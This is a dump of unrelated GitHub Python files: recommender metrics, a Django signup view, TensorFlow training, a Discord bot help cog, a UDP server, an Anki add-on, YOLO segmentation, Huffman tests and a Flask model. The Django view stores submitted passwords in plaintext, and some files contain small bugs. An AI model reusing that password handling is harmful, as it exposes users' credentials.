self.NDCG, self.MAE, self.RMSE\r\n\r\n # 下面是METRICS_02,因为按照我的评分矩阵的布局,只要是出现在训练集中的,都给了个无穷大的负值,所以FP一定等于0,这是不是一般都不用precision, recall, F1那些指标的原因呢?\r\n '''\r\n def METRICS_02(self):\r\n # 下面的数据都是将在Metrics中共用的信息\r\n self.size_of_train_dataset = self.train_dataset.shape[0]\r\n self.size_of_test_dataset = self.test_dataset.shape[0] # 注意shape后面是[]而不是()\r\n self.size_of_recommendation_list = len(self.recommendation_list) * self.recommendation_size # len(dict)可用于返回字典\"键\"的个数\r\n self.TP = 0\r\n self.FP = 0\r\n self.TN = 0\r\n self.FN = 0\r\n self.abs_deviation_of_ratings = 0\r\n self.square_deviation_of_ratings = 0\r\n\r\n for row in self.test_dataset.iloc():\r\n if row['user'] in self.recommendation_list.keys():\r\n if row['item'] in self.recommendation_list[row['user']].values: # dict.items()输出的是整个字典,所以这里要这样判断\r\n self.TP = self.TP + 1\r\n self.abs_deviation_of_ratings = self.abs_deviation_of_ratings + abs(self.estimated_rating_matrix.loc[row['user'], row['item']] - row['rating'])\r\n self.square_deviation_of_ratings = self.square_deviation_of_ratings + (self.estimated_rating_matrix.loc[row['user'],row['item']] - row['rating'])**2\r\n else:\r\n self.TN = self.TN + 1\r\n\r\n for row in self.train_dataset.iloc():\r\n if row['user'] in self.recommendation_list.keys():\r\n if row['item'] in self.recommendation_list[row['user']].values:\r\n self.FP = self.FP + 1\r\n else:\r\n self.FN = self.FN + 1\r\n\r\n\r\n # print('TP=',self.TP, 'TN=', self.TN, 'FP=', self.FP, 'FN=', self.FN)\r\n # print('list_size=',self.size_of_recommendation_list,'TP+FP=', self.TP + self.FP)\r\n # print('not_list_size=', self.size_of_train_dataset - self.size_of_recommendation_list, 'TN+FN=', self.TN + self.FN)\r\n # print('train_dataset_size=', self.size_of_train_dataset, 'FP+FN=', self.FP + self.FN)\r\n # print('test_dataset_size=', self.size_of_test_dataset, 'TP+TN=',self.TP + self.TN)\r\n\r\n # 以下是指标的计算\r\n self.precision = self.TP / (self.TP + self.FP)\r\n self.recall = self.TP / (self.TP + self.FN)\r\n self.F1 = (2 * self.precision * self.recall) / (self.precision + self.recall)\r\n self.MAE = (1 / self.size_of_test_dataset) * self.abs_deviation_of_ratings # 这里有BUG,应该用参与比较的那些test来作为分母!\r\n self.RMAE = math.sqrt((1 / self.size_of_test_dataset)* self.square_deviation_of_ratings)\r\n\r\n return self.precision, self.recall, self.F1, self.MAE, self.RMAE\r\n '''","repo_name":"pitteryue/Recommender-Systems","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"3121320873","text":"\n\"\"\"\nImportaciones \n\"\"\"\nfrom datetime import datetime\nfrom multiprocessing.dummy.connection import Client\nfrom django.http import HttpResponse \nfrom django.template import loader\nfrom .models import ClientePasaje\nfrom django.urls import reverse \nfrom django.shortcuts import HttpResponseRedirect \n\n\"\"\"\nFuncion home, tiene la finalidad de conectar a la plantilla \ninscripcionpasaje con el proyecto\n\"\"\"\ndef home(request):\n template = loader.get_template('inscripcionpasaje.html') \n client = ClientePasaje.objects.all().values()\n context = { \n 'client':client,\n }\n return HttpResponse(template.render(context,request))\n\"\"\"\nFuncion confirmarinscripcionpasaje, tiene la función de pasar los datos ingresados a la base de datos e \nimprimirlo dentro de la plantilla confirmarinscripcionpasaje\n\"\"\"\ndef confirmacioninscripcionpasaje(request):\n x = request.POST['nombre'] \n y = request.POST['direccion'] \n z = request.POST['correo'] \n a = request.POST['contraseña'] \n b = request.POST['Mes'] \n c = request.POST['Dia'] \n d = request.POST['año'] \n e = request.POST['gender'] \n f = request.POST['aficiones'] \n g = request.POST.getlist('inter[]')\n if (int(datetime.now().date().strftime(\"%Y\"))-int(d)>=18):\n member = ClientePasaje(Nombre=x, Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=1000) \n member.save() \n elif (int(datetime.now().date().strftime(\"%Y\"))-int(d)<18 and int(datetime.now().date().strftime(\"%Y\"))-int(d)>2):\n member = ClientePasaje(Nombre=x, Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=750) \n member.save() \n elif (int(datetime.now().date().strftime(\"%Y\"))-int(d)<=2):\n member = ClientePasaje(Nombre=x, Correo_Electronico=z, Dirección=y, Contraseña=a, \n FechaNac= c+\"/\"+b+\"/\"+d, Sexo=e, Aficiones=f, Intereces=g, Precio=0) \n member.save() \n misclientes = ClientePasaje.objects.get(id=member.id) \n template = loader.get_template('confirmacioninscripcionpasaje.html') \n context = {\n 'misclientes': misclientes,\n } \n return HttpResponse(template.render(context, request)) \n\n\n \n","repo_name":"CinthyaYanarico/Practica_10","sub_path":"DjangoPr10/PyPsjaereo/appinscripcion/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10295163512","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n# pylint: disable=missing-docstring\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport random\nimport gzip\nimport os\nimport re\nimport sys\n\nimport tensorflow as tf\nimport svhn\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string('train_dir', 'trained_models',\n \"\"\"Directory where to write event logs \"\"\"\n \"\"\"and checkpoint.\"\"\")\ntf.app.flags.DEFINE_integer('max_steps', 101,\n \"\"\"Number of batches to run.\"\"\")\ntf.app.flags.DEFINE_boolean('log_device_placement', False,\n \"\"\"Whether to log device placement.\"\"\")\n\n\ndef train():\n\n with tf.Graph().as_default():\n # Get data and labels\n SVHN_data = svhn.get_data()\n train_dataset = SVHN_data['train_dataset']\n train_labels = SVHN_data['train_labels']\n valid_dataset = SVHN_data['valid_dataset']\n valid_labels = SVHN_data['valid_labels']\n test_dataset = SVHN_data['test_dataset']\n test_labels = SVHN_data['test_labels']\n\n # Input data.\n tf_train_dataset = tf.placeholder(tf.float32, shape=(FLAGS.BATCH_SIZE, FLAGS.IMAGE_SIZE, FLAGS.IMAGE_SIZE, FLAGS.NUM_CHANNELS))\n tf_train_labels = tf.placeholder(tf.int64, shape=(FLAGS.BATCH_SIZE, FLAGS.N+1))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n\n # Build a Graph that computes the logits predictions from the\n # inference model.\n CNN = svhn.CNN()\n logits = CNN.inference(tf_train_dataset)\n\n # Calculate loss.\n loss = CNN.loss(logits, tf_train_labels)\n\n # Build a Graph that trains the model with one batch of examples and\n # updates the model parameters.\n optimizer = CNN.train(loss)\n\n # Preds to estimate\n train_prediction = CNN.predict(tf_train_dataset)\n test_prediction = CNN.predict(tf_test_dataset)\n valid_prediction = CNN.predict(tf_valid_dataset)\n\n # Create a saver.\n saver = tf.train.Saver(tf.all_variables())\n\n # Build an initialization operation to run below.\n init = tf.initialize_all_variables()\n\n # Start running operations on the Graph.\n sess = tf.Session(config=tf.ConfigProto(\n log_device_placement=FLAGS.log_device_placement))\n sess.run(init)\n\n saver.restore(sess, os.path.join(FLAGS.train_dir, 'model.ckpt'))\n print('Model Restored')\n #print('Initialized')\n\n for step in range(FLAGS.max_steps):\n offset = (step * FLAGS.BATCH_SIZE) % (train_labels.shape[0] - FLAGS.BATCH_SIZE)\n batch_data = train_dataset[offset:(offset + FLAGS.BATCH_SIZE), :, :, :]\n batch_labels = train_labels[offset:(offset + FLAGS.BATCH_SIZE),:]\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n _, l, predictions = sess.run(\n [optimizer, loss, train_prediction], feed_dict=feed_dict)\n if (step % 5000 == 0):\n print('Minibatch loss at step %d: %f' % (step, l))\n # Commented partial estimation to improve the performance of the training computation\n #print('Minibatch accuracy: %.1f%%' % svhn.accuracy(predictions, batch_labels))\n #print('Validation accuracy: %.1f%%' % svhn.accuracy(valid_prediction.eval(session=sess), valid_labels))\n\n print('Out of training')\n checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')\n sr = saver.save(sess, checkpoint_path)\n print('Model Saved')\n #print('Evaluating the final performance')\n #print('Test accuracy: %.1f%%' % svhn.accuracy(test_prediction.eval(session=sess), test_labels))\n\n\ndef main(argv=None): # pylint: disable=unused-argument\n svhn.load_data()\n #if tf.gfile.Exists(FLAGS.train_dir):\n # tf.gfile.DeleteRecursively(FLAGS.train_dir)\n #tf.gfile.MakeDirs(FLAGS.train_dir, 0777) # force permissions\n train()\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"archelogos/sequence-detector","sub_path":"project/train-scripts/svhn_train.py","file_name":"svhn_train.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"38"} +{"seq_id":"39570403920","text":"import scipy as sp\nimport matplotlib.pyplot as plt\n\nplt.rcParams.update({'font.size': 18})\nplt.rcParams[\"figure.figsize\"] = (15,15)\n\nfile = open('stm.txt', 'r')\nheight=sp.empty([663, 676])\ni=0\nfor line in file:\n height[i]=line.split()\n i+=1\nplt.imshow(height)\nplt.title('(111) Silicon surface mapping using STM') \nplt.colorbar().set_label('Height (STM data)')\nplt.savefig('silicon.png')\nplt.show()\n","repo_name":"gsomani/computational-physics","sub_path":"HW1/GauravSomani_HW1/13/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"38456606672","text":"import discord\nfrom discord.ext import commands\n\n\nclass Help(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.color = discord.Color.red()\n\n @commands.command()\n async def help(self, ctx, command=None):\n if not command:\n await self.send_all_commands(ctx)\n else:\n await self.send_specific_command(ctx, command)\n\n async def send_embed(self, ctx, title=None, description=None, color=None, url=None, timestamp=None, fields=None, thumbnail=None, image=None, author=None, footer=None, icon_url=None, proxy_icon_url=None):\n embed = discord.Embed(\n title=title,\n description=description,\n color=color,\n )\n if url:\n embed.url = url\n if timestamp:\n embed.timestamp = timestamp\n\n if fields:\n for name, value, inline in fields:\n embed.add_field(name=name, value=value, inline=inline)\n\n if thumbnail:\n embed.set_thumbnail(url=thumbnail)\n\n if image:\n embed.set_image(url=image)\n\n if author:\n embed.set_author(name=author, icon_url=icon_url, url=url)\n\n if footer:\n embed.set_footer(text=footer, icon_url=proxy_icon_url)\n\n await ctx.send(embed=embed)\n\n async def send_all_commands(self, ctx):\n embed = discord.Embed(\n title=\"Help\", description=\"List of available commands (non-slash)\", color=self.color)\n embed.set_thumbnail(url=self.bot.user.avatar)\n\n # Add Actions commands\n actions_cog = self.bot.get_cog(\"Actions\")\n actions_commands = [\n f\"`{command.name}`\" for command in actions_cog.get_commands()]\n actions_command_list = \" | \".join(actions_commands)\n embed.add_field(\n name=\"Actions\", value=actions_command_list, inline=False)\n\n # Add Emotes commands\n emotes_cog = self.bot.get_cog(\"Emotes\")\n emotes_commands = [\n f\"`{command.name}`\" for command in emotes_cog.get_commands()]\n emotes_command_list = \" | \".join(emotes_commands)\n embed.add_field(name=\"Emotes\", value=emotes_command_list, inline=False)\n util_list = [\"help\", \"info\",\n \"userinfo\", \"ping\", \"server\", \"invite\"]\n embed.add_field(name=\"Utils\", value=\" | \".join(\n [\"`{}`\".format(command) for command in util_list]), inline=False)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n\n await ctx.send(embed=embed)\n\n async def send_specific_command(self, ctx, command):\n actions_cog = self.bot.get_cog(\"Actions\")\n emotes_cog = self.bot.get_cog(\"Emotes\")\n\n act = [i.name for i in actions_cog.get_commands()]\n if command in act:\n embed = discord.Embed()\n embed.title = 'Help ' + command\n embed.description = 'Action commands! \\nShow your actions!!\\n'\n embed.add_field(name='Other action commands',\n value=','.join(act), inline=False)\n embed.color = self.color\n embed.set_thumbnail(url=self.bot.user.avatar)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n await ctx.send(embed=embed)\n\n eact = [i.name for i in emotes_cog.get_commands()]\n if command in eact:\n embed = discord.Embed()\n embed.title = 'Help ' + command\n embed.description = 'Emotion commands! \\nShow your emotions!!\\n'\n embed.add_field(name='Other emote commands',\n value=','.join(eact), inline=False)\n embed.color = self.color\n embed.set_thumbnail(url=self.bot.user.avatar)\n embed.set_footer(\n text=f\"Requested by {ctx.author}\", icon_url=ctx.author.avatar)\n await ctx.send(embed=embed)\n\n if command == 'server':\n await self.send_embed(ctx, 'Help Server', 'Shows server information', self.color, fields=[('Usage', '!server', False)], thumbnail=ctx.guild.icon, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'ping':\n await self.send_embed(ctx, 'Help Ping', 'Check the bot\\'s latency', self.color, fields=[('Usage', '!ping', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'userinfo':\n await self.send_embed(ctx, 'Help Userinfo', 'Display user information', self.color, fields=[('Usage', '!userinfo [user]', False)], thumbnail=ctx.author.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'info':\n await self.send_embed(ctx, 'Help Info', 'Display bot information', self.color, fields=[('Usage', '!info', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n elif command == 'invite':\n await self.send_embed(ctx, 'Help Invite', 'Get the bot\\'s invite link', self.color, fields=[('Usage', '!invite', False)], thumbnail=self.bot.user.avatar, footer=f'Requested by {ctx.author}', proxy_icon_url=ctx.author.avatar)\n else:\n await ctx.send(f\"Command `{command}` not found.\")\n","repo_name":"oxy-Op/oxemble-bot","sub_path":"commands/utils/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"33308258862","text":"# 回文串\n# https://leetcode-cn.com/problems/valid-palindrome/\n# 给定一个字符串,验证它是否是回文串,只考虑字母和数字字符,可以忽略字母的大小写。\n#\n# 说明:本题中,我们将空字符串定义为有效的回文串。\n#\n#\n#\n# 示例\n# 1:\n#\n# 输入: \"A man, a plan, a canal: Panama\"\n# 输出: true\n# 解释:\"amanaplanacanalpanama\"\n# 是回文串\nclass Solution:\n\n def isPalindrome(self, s: str) -> bool:\n s_len = len(s)\n if s_len == 1:\n return True\n start = 0\n end = s_len - 1\n\n while start < end:\n if s[start].isalnum() is False:\n start += 1\n while s[start].isalnum() is False and start < end:\n start += 1\n\n if s[end].isalnum() is False:\n end -= 1\n while s[end].isalnum() is False and end > start:\n end -= 1\n\n if start > end:\n return True\n\n if s[start].lower() != s[end].lower():\n print( s[start], s[end])\n return False\n start += 1\n end -= 1\n\n return True\n\n\n\nt = Solution()\n# print(t.isPalindrome(\"A man, a plan, a canal: Panama\"))\nprint(t.isPalindrome(\".,\"))\nprint(\"a\".isalnum())","repo_name":"as543343879/gelin_python","sub_path":"leetcode/palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"2407454057","text":"# Вводим строку\n\ntext = input('Введите текст в виде строки: ')\n\n# Разбиваем строку на элементы и вносим в список\n\nmy_list = text.split()\n\n# Печатаем получившийся список\n\nprint(my_list)\n\n# Выводим элементы списка с нумерацией (не более 10-ти букв в слове)\n\nfor i in range(len(my_list)):\n print('{})'.format(i + 1), my_list[i][:10])\n","repo_name":"Arverkos/GeekBrains-Homeprojects","sub_path":"py_intro02/Lesson02.Task04.py","file_name":"Lesson02.Task04.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34155541614","text":"from socket import *\r\n\r\nserverPort = 12000\r\n\r\n#SOCK_DGRAM indicates udp transport\r\nserverSocket = socket(AF_INET, SOCK_DGRAM)\r\n\r\n#bind to port number 12000 for incoming connection\r\nserverSocket.bind(('', serverPort))\r\n\r\nprint(\" The server is ready to receive\")\r\n\r\nwhile True:\r\n \r\n #recieve the input from client\r\n message, clientAddress = serverSocket.recvfrom(2048)\r\n \r\n #convert bytes to string\r\n message = message.decode()\r\n \r\n modifiedMessage = message.upper()\r\n \r\n print(modifiedMessage)\r\n \r\n #send the modified message back to client\r\n serverSocket.sendto(modifiedMessage.encode(), clientAddress)","repo_name":"alanlyyy/Computer-Networking-Top-Down-Approach","sub_path":"UDPServer.py","file_name":"UDPServer.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6994143467","text":"# encoding: utf-8\nfrom aqt import mw\nfrom aqt.qt import *\nfrom aqt.utils import showInfo, tooltip\n\nfrom .view import formguessids, window_to_front, set_combobox_from_config, immediate_redraw\nfrom .edict.search import search_edict\nfrom . import furigana\nimport anki\n\nclass GuessEDICTWindow(QDialog):\n instance = None\n\n @classmethod\n def open(cls, parent):\n if cls.instance is None:\n cls.instance = cls(parent)\n else:\n window_to_front(cls.instance)\n return cls.instance\n\n def closeEvent(self, evt):\n type(self).instance = None\n self.hide()\n evt.accept()\n\n def __init__(self, parent):\n QDialog.__init__(self)\n self.form = formguessids.Ui_Dialog()\n self.form.setupUi(self)\n\n self.form.guessButton.clicked.connect(self.on_click_guess_button)\n\n self.note_ids = parent.selected_notes()\n if not self.note_ids:\n showInfo('Please select cards first')\n self.close()\n return\n note_id = self.note_ids[0]\n note = mw.col.getNote(note_id)\n self.model = note.model()\n model_name = self.model['name']\n\n # restore state from configuration\n # model\n self.form.modelValue.setText(self.model['name'])\n self.update_fieldboxes() # fill combo boxes for selected model\n self.update_enabled()\n # field mapping\n field_names = [''] + [field['name'] for field in self.model['flds']]\n set_combobox_from_config(self.form.kanjiBox, field_names, 'guessedict_kanjiField')\n set_combobox_from_config(self.form.kanaBox, field_names, 'guessedict_kanaField')\n set_combobox_from_config(self.form.furiganaBox, field_names, 'guessedict_furiganaField')\n set_combobox_from_config(self.form.definitionBox, field_names, 'guessedict_definitionField')\n set_combobox_from_config(self.form.idBox, field_names, 'guessedict_idField')\n\n # events\n self.set_onChange_combobox(self.form.kanjiBox, 'guessedict_kanjiField')\n self.set_onChange_combobox(self.form.kanaBox, 'guessedict_kanaField')\n self.set_onChange_combobox(self.form.furiganaBox, 'guessedict_furiganaField')\n self.set_onChange_combobox(self.form.definitionBox, 'guessedict_definitionField')\n self.set_onChange_combobox(self.form.idBox, 'guessedict_idField')\n\n self.show()\n\n def set_onChange_combobox(self, combobox, config_key):\n def _(combobox):\n def onChange():\n mw.col.conf[config_key] = combobox.currentText() if combobox.currentIndex() != 0 else None\n mw.col.setMod()\n self.update_enabled()\n return onChange\n combobox.currentIndexChanged.connect(_(combobox))\n\n def keyPressEvent(self, event):\n if event.key() == Qt.Key_Escape:\n self.close()\n\n def onChangeModel(self):\n mw.col.conf['guessedict_model'] = self.form.modelBox.currentText()\n mw.col.setMod()\n self.update_fieldboxes()\n self.update_enabled()\n\n def update_fieldboxes(self):\n field_names = [''] + [field['name'] for field in self.model['flds']]\n\n self.form.kanjiBox.clear()\n self.form.kanaBox.clear()\n self.form.furiganaBox.clear()\n self.form.definitionBox.clear()\n self.form.idBox.clear()\n\n self.form.kanjiBox.addItems(field_names)\n self.form.kanaBox.addItems(field_names)\n self.form.furiganaBox.addItems(field_names)\n self.form.definitionBox.addItems(field_names)\n self.form.idBox.addItems(field_names)\n\n def enough_fields_given(self):\n ok = False\n if mw.col.conf.get('guessedict_kanjiField'):\n ok = True\n if mw.col.conf.get('guessedict_kanField'):\n ok = True\n if mw.col.conf.get('guessedict_furiganaField'):\n ok = True\n if not mw.col.conf.get('guessedict_idField'):\n ok = False\n return ok\n\n def update_enabled(self):\n self.form.guessButton.setEnabled(self.enough_fields_given())\n\n def on_click_guess_button(self):\n self.form.guessButton.setText('Guessing...')\n immediate_redraw(self)\n self.guess()\n self.close()\n\n def guess(self):\n # get field names\n kanji_field = mw.col.conf.get('guessedict_kanjiField')\n kana_field = mw.col.conf.get('guessedict_kanaField')\n furigana_field = mw.col.conf.get('guessedict_furiganaField')\n definition_field = mw.col.conf.get('guessedict_definitionField')\n id_field = mw.col.conf.get('guessedict_idField')\n\n n_ignored = 0\n n_guessed = 0\n n_ambiguous = 0\n for note_id in self.note_ids:\n note = mw.col.getNote(note_id)\n\n # gather information about kanji and kana\n kanji = None\n kana = None\n if furigana_field:\n kanji = furigana.kanji(note[furigana_field])\n kana = furigana.kana(note[furigana_field])\n elif kanji_field:\n kanji = note[kanji_field]\n elif kana_field:\n kana = note[furigana_field]\n\n # gather information about definition\n definition = None\n if definition_field:\n definition = note[definition_field]\n\n # search\n if kanji is not None:\n words = search_edict(kanji)\n elif kana is not None:\n words = search_edict(kana)\n else:\n raise NotImplemented\n\n # filter words\n if kanji is not None:\n # or kanji == word.kanji ?\n words = [word for word in words if kanji in word.writings + word.readings]\n if kana is not None:\n # or kana == word.kana ?\n words = [word for word in words if kana in word.writings + word.readings]\n if definition is not None:\n words = [word for word in words if definition == word.get_meanings_html()]\n\n # updatenote\n if len(words) == 0: # not in EDICT\n # can be found by filtering over id field\n n_ignored += 1\n elif len(words) == 1:\n word, = words\n note[id_field] = word.get_sequence_number()\n n_guessed += 1\n else: # several matches\n note.addTag('ambiguous')\n n_ambiguous += 1\n note.flush()\n mw.reset()\n\n ignored = ngettext('{} card ignored.', '{} cards ignored.', n_ignored).format(n_ignored)\n guessed = ngettext('{} card ID guessed.', '{} card IDs guessed.', n_guessed).format(n_guessed)\n ambiguous = ngettext('{} card marked ambiguous.', '{} cards marked ambiguous.', n_ambiguous).format(n_ambiguous)\n tooltip('
'.join([ignored, guessed, ambiguous]))\n","repo_name":"qsantos/searchedict","sub_path":"searchedict/guessedict.py","file_name":"guessedict.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4142103182","text":"import cv2\nimport sys\nimport time # Importa el módulo time\n\nsys.path.append('../Seeker_ComputerVision')\n\nfrom scr.libs.YOLOSeg import YOLOSeg\n\ndef apply_clahe_gaussian(gray):\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n return blurred\n\n# Initialize the webcam\ncap = cv2.VideoCapture(0, cv2.CAP_V4L2)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 640)\ncap.set(cv2.CAP_PROP_FPS, 59)\n\n# Initialize YOLOv5 Instance Segmentator\nmodel_path = \"../Seeker_ComputerVision/YoloTrain/runs/segment/train/weights/best2.onnx\"\nyoloseg = YOLOSeg(model_path, conf_thres=0.79, iou_thres=0.3)\n\ncv2.namedWindow(\"Detected Objects\", cv2.WINDOW_NORMAL)\n\n# Inicializa el tiempo al comienzo\nstart_time = time.time()\n\nwhile cap.isOpened():\n # Read frame from the video\n ret, frame = cap.read()\n \n frame = cv2.rotate(frame, cv2.ROTATE_180)\n\n if not ret:\n break\n\n # Update object localizer\n boxes, scores, class_ids, masks = yoloseg(frame)\n\n combined_img = yoloseg.draw_masks(frame)\n cv2.imshow(\"Detected Objects\", combined_img)\n\n # Calcula los FPS\n elapsed_time = time.time() - start_time\n fps = 1 / elapsed_time\n print(f\"FPS: {fps:.2f}\")\n\n # Actualiza el tiempo para el siguiente ciclo\n start_time = time.time()\n\n # Press key q to stop\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Libera la captura de video y cierra las ventanas\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"97hackbrian/Seeker_ComputerVision","sub_path":"test/segmentONNX.py","file_name":"segmentONNX.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"31288765488","text":"import unittest\nfrom bitarray import bitarray\nfrom huffman.huffman import HuffmanCoding\n\nclass TestHuffmanCoding(unittest.TestCase):\n def make_test_bitarray(self) -> bitarray:\n # / \\\n # /\\ /\\\n # /\\ c d e\n # a b\n testbuffer = bitarray('0001')\n testbuffer.frombytes(str.encode(\"A\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"B\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"C\"))\n testbuffer.extend([0,1])\n testbuffer.frombytes(str.encode(\"D\"))\n testbuffer.append(1)\n testbuffer.frombytes(str.encode(\"E\"))\n return testbuffer\n\n def make_test_tree(self) -> HuffmanCoding.TreeNode:\n huffman_coding = HuffmanCoding(\"\",\"\")\n root = huffman_coding.TreeNode(None, 0)\n root.left = huffman_coding.TreeNode(None, 0)\n root.left.left = huffman_coding.TreeNode(None, 0)\n root.left.left.left = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"A\"), byteorder='big'), 0\n )\n root.left.left.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"B\"), byteorder='big'), 0\n )\n root.left.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"C\"), byteorder='big'), 0\n )\n root.right = huffman_coding.TreeNode(None, 0)\n root.right.left = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"D\"), byteorder='big'), 0\n )\n root.right.right = huffman_coding.TreeNode(\n int.from_bytes(str.encode(\"E\"), byteorder='big'), 0\n )\n return root\n\n def test__str__(self):\n self.assertEqual(\n isinstance(str(self.make_test_tree()), str),\n True\n )\n def test_encode(self):\n input_path = \"samples/munkki_kammio.txt\"\n encoded = \"testing_files/munkki_kammio.txt.hc\"\n decoded = \"testing_files/munkki_kammio_hc.txt\"\n HuffmanCoding(input_path, encoded).encode()\n HuffmanCoding(encoded, decoded).decode()\n with open(input_path, \"rb\") as original, open(decoded, \"rb\") as new:\n original_str = original.read()\n new_str = new.read()\n self.assertEqual(original_str, new_str)\n\n def test_huffman_codes(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n byte_to_code_dict = huffman_coding.huffman_codes(\n self.make_test_tree()\n )\n self.assertEqual(\n byte_to_code_dict[int.from_bytes(str.encode(\"A\"), byteorder='big')],\n bitarray('111')\n )\n\n def test_tree_to_bitarray(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n\n self.assertEqual(\n self.make_test_bitarray(),\n huffman_coding.tree_to_bitarray(\n self.make_test_tree()\n )\n )\n\n def test_header_to_binarytree(self):\n huffman_coding = HuffmanCoding(\"\",\"\")\n og_test_buffer = self.make_test_bitarray()\n test_buffer_with_tail_bits = og_test_buffer + bitarray('01110')\n (root_from_test_buffer, index) = huffman_coding.header_to_binarytree(test_buffer_with_tail_bits, 0)\n new_buffer = huffman_coding.tree_to_bitarray(root_from_test_buffer)\n self.assertEqual(\n og_test_buffer,\n new_buffer\n )\n\n def test_encoded_tail_length(self):\n data = bitarray('11100000')\n huffman_coding = HuffmanCoding(\"\",\"\")\n self.assertEqual(\n huffman_coding.encoded_tail_length(data),\n 7\n )\n","repo_name":"elonheimo/compression-algos","sub_path":"src/tests/huffman_test.py","file_name":"huffman_test.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11072705325","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app.models.user import User\n\nclass Comment:\n def __init__(self, data):\n self.id = data['id']\n self.title = data['title']\n self.comment = data['comment']\n self.rate = data['rate']\n self.user_id = data['user_id']\n self.course_id = data['course_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n self.first_name = data['first_name']\n self.author = User.get_by_id(self.user_id)\n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM comments;\"\n results = connectToMySQL('learn_app').query_db(query)\n if results:\n return [cls(result) for result in results]\n return False\n @classmethod\n def save(cls, data):\n query = \"INSERT INTO comments (title, comment, rate, user_id, course_id) VALUES (%(title)s, %(comment)s, %(rate)s, %(user_id)s, %(course_id)s);\"\n return connectToMySQL('learn_app').query_db(query, data)\n @classmethod\n def get_by_id(cls, data):\n id = { 'id': data }\n query = \"SELECT * FROM comments WHERE id = %(id)s;\"\n result = connectToMySQL('learn_app').query_db(query, id)\n return cls(result[0])\n @classmethod\n def update(cls, data):\n query = \"UPDATE comments SET title = %(title)s, comment = %(comment)s, rate = %(rate)s WHERE id = %(id)s;\"\n return connectToMySQL('learn_app').query_db(query, data)\n @classmethod\n def delete(cls, data):\n id = {'id': data }\n query = \"DELETE FROM comments WHERE id = %(id)s;\"\n return connectToMySQL('learn_app').query_db(query, id)\n @classmethod\n def get_by_course_id(cls, data):\n id = { 'id': data }\n query = \"SELECT comments.*,users.first_name AS first_name FROM comments LEFT JOIN users ON users.id=comments.user_id WHERE course_id = %(id)s;\"\n results = connectToMySQL('learn_app').query_db(query, data)\n if results:\n return [cls(result) for result in results]\n return 